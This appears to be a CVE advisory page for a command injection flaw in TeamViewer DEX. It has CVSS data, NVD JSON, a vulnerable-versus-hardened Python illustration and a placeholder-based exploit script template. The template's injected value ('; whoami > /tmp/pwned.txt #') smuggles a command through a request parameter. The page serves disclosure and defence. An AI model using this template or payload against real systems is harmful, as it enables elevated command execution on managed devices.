Security Vulnerability Report
CVE-2025-64993

CVSS 6.8 MEDIUM (secondary metric; the NVD primary metric for this record is 7.2 HIGH, see CVSS Details)

Published: 2025-12-11 12:16:26
Last Modified: 2026-01-09 02:06:24

Description

A command injection vulnerability (CWE-77) was discovered in TeamViewer DEX (formerly 1E DEX), specifically within the 1E-ConfigMgrConsoleExtensions instructions. Improper input validation allows an authenticated attacker with Actioner privileges to inject arbitrary commands into an instruction. Successful exploitation gives remote execution of elevated commands on devices connected to the platform. The attacker must already hold an Actioner account, which is why both CVSS vectors rate Privileges Required as High.
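The description names the bug class but not the pattern behind it. The block below is an added illustration written for this page; it is not code from TeamViewer, 1E, or the vendor advisory. It models an instruction handler that splices an untrusted targetDevice field into a shell command line (the CWE-77 pattern) beside a hardened handler that allow-lists both the instruction and the host name and then executes a fixed argv vector with no shell. The request shape, the field names and the PingDevice instruction are assumptions borrowed from the PoC later on this page, and echo stands in for whatever tool a real instruction would run.

```python
import re
import subprocess

# Constructed sample request in the shape used by the PoC on this page.  The
# field names and the "PingDevice" instruction are assumptions for this
# example, not the product's documented API.
SAMPLE_REQUEST = {
    "instruction": "PingDevice",
    "targetDevice": "WORKSTATION-01; echo INJECTED",
    "parameters": {"timeout": 30},
}

# Allow-list for targetDevice: a single DNS/NetBIOS-style label, alphanumerics
# and hyphens only.  Rejecting a leading '-' also blocks argument injection
# (a host of "-n" becoming an option), which argv execution alone does not stop.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]{0,62}$")

# Permitted instructions mapped to fixed argv templates.  The caller picks a
# template and a host; it never supplies command text.  "echo" stands in for
# the real tool so the example runs anywhere.
INSTRUCTIONS = {
    "PingDevice": ["echo", "pinging", "{host}"],
}


def run_vulnerable(request: dict) -> str:
    """CWE-77 pattern: the untrusted field is interpolated into a shell
    command line, so ';', '&&', '|', '$(...)' are interpreted by /bin/sh."""
    cmd = f"echo pinging {request['targetDevice']}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def exec_argv(host: str) -> str:
    """Argv execution without a shell: the host reaches the tool as one
    argument, so shell metacharacters stay literal text.  This is the second
    layer only; it does not replace validation (see run_hardened)."""
    argv = ["echo", "pinging", host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def run_hardened(request: dict) -> dict:
    """Validate against the allow-lists, then exec an argv template.
    Returns {"ok": True, "output": ...} or {"ok": False, "error": ...}."""
    instr = request.get("instruction")
    host = request.get("targetDevice", "")
    if instr not in INSTRUCTIONS:
        return {"ok": False, "error": f"unknown instruction {instr!r}"}
    if not HOSTNAME_RE.fullmatch(host):
        return {"ok": False, "error": f"targetDevice {host!r} rejected by allow-list"}
    argv = [host if a == "{host}" else a for a in INSTRUCTIONS[instr]]
    out = subprocess.run(argv, capture_output=True, text=True).stdout
    return {"ok": True, "output": out}


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(SAMPLE_REQUEST)))        # injected echo ran: two lines
    print("argv only :", repr(exec_argv(SAMPLE_REQUEST["targetDevice"])))  # one literal line
    print("hardened  :", run_hardened(SAMPLE_REQUEST))                # rejected before exec
    print("hardened  :", run_hardened({"instruction": "PingDevice",
                                       "targetDevice": "WORKSTATION-01"}))
```

The hardened handler applies both layers on purpose: the allow-list is what keeps a crafted host from becoming an option or a second token, and the argv vector is what keeps the shell out of the path even if validation is later loosened.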

CVSS Details

The NVD record carries two CVSS v3.1 metrics; the page headline uses the secondary one.

Secondary metric
CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Primary metric (NVD)
CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

The two vectors differ only in User Interaction (UI:R vs UI:N). Weaknesses: CWE-77 (Improper Neutralization of Special Elements used in a Command) on the primary record, CWE-20 (Improper Input Validation) on the secondary record.

Configurations (Affected Products)

cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding: 29.0)
TeamViewer DEX (1E DEX) < 29.0 (fixed version per the NVD configuration; see the vendor bulletin TV-2025-1006 for the exact build)
1E-ConfigMgrConsoleExtensions < security-patched version (the NVD record gives no version range for the extension itself)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
This script is a template, not a working exploit: the endpoint path, the ExecuteSystemCommand instruction, the parameter names, the session and token values and the Unix-style payload are placeholders that the vendor advisory does not publish. It has to be adapted to the real 1E-ConfigMgrConsoleExtensions request format before it does anything.

python
# CVE-2025-64993 PoC - TeamViewer DEX Command Injection
# Requires: valid credentials with Actioner privileges
#
# Template only: TARGET_URL, the "ExecuteSystemCommand" instruction, the
# parameter names and the credential values are placeholders that are not
# taken from the vendor advisory.
import requests

TARGET_URL = "https://vulnerable-server/1E-ConfigMgrConsoleExtensions/api"
SESSION_COOKIE = "your_session_cookie_here"


def exploit_command_injection():
    """
    Demonstrates command injection in 1E-ConfigMgrConsoleExtensions.
    Sends an instruction whose command parameter carries shell metacharacters
    that the vulnerable instruction handler does not validate.
    """
    headers = {
        'Cookie': f'session={SESSION_COOKIE}',
        'Content-Type': 'application/json',
        'Authorization': 'Bearer your_token_here'
    }
    # Malicious payload exploiting command injection.
    # The vulnerable endpoint does not properly sanitize input.
    # NOTE: ';' and '/tmp' are Unix-shell placeholders; ConfigMgr-managed
    # endpoints are typically Windows hosts, so a real test would use
    # cmd/PowerShell separators ('&', '|') and a Windows path.
    malicious_command = "; whoami > /tmp/pwned.txt #"
    payload = {
        "instruction": "ExecuteSystemCommand",
        "targetDevice": "WORKSTATION-01",
        "parameters": {
            "command": f"legitimate_command{malicious_command}",
            "timeout": 30
        }
    }
    try:
        # verify=False disables TLS verification; acceptable only against a lab target.
        response = requests.post(TARGET_URL, json=payload, headers=headers,
                                 verify=False, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        # HTTP 200 only means the instruction was accepted; confirm execution
        # on the target (the dropped file), not from the status code alone.
        if response.status_code == 200:
            print("[+] Instruction accepted - check /tmp/pwned.txt on target")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


def verify_vulnerability():
    """
    Report the target's version so it can be compared with the fixed build
    (NVD lists TeamViewer DEX < 29.0 as affected).
    """
    # The /version path is a placeholder, like TARGET_URL.
    check_url = f"{TARGET_URL}/version"
    try:
        response = requests.get(check_url,
                                headers={'Cookie': f'session={SESSION_COOKIE}'},
                                verify=False, timeout=10)
        version_info = response.json()
        print(f"[*] Target version: {version_info.get('version', 'Unknown')}")
    except (requests.exceptions.RequestException, ValueError) as e:
        print(f"[-] Version check failed: {e}")


if __name__ == "__main__":
    print("CVE-2025-64993 PoC - TeamViewer DEX Command Injection")
    print("=" * 60)
    verify_vulnerability()
    exploit_command_injection()

References

https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ (Vendor Advisory, TV-2025-1006)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64993",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-11T12:16:26.320",
    "lastModified": "2026-01-09T02:06:24.377",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-ConfigMgrConsoleExtensions instructions. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-20"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-77"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "29.0",
                "matchCriteriaId": "3E15BFE6-D57C-4F21-8284-68ABE840512C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}